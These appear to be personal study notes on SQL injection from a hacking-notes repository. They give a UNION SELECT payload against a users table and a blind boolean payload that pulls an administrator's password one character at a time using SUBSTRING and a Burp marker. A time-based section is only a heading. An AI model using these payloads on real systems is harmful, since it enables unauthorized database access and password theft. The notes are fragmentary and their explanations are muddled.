Jr0dR87/Hacking_Notes/sqli/README.md

 PARAM VALUE' union select 1,2,3 from users where username like 'a% Will help get values from table and columns)

+Simple Blind Query to pull administrator password.
+Substring is comparing password and pulling out the 7th character and starting at posistion 1.
+' AND (SELECT SUBSTRING(password,7,1) FROM users WHERE username='administrator')='$Burp Marker$;

 ## Blind SQLi (Time) ##

 Change param in url.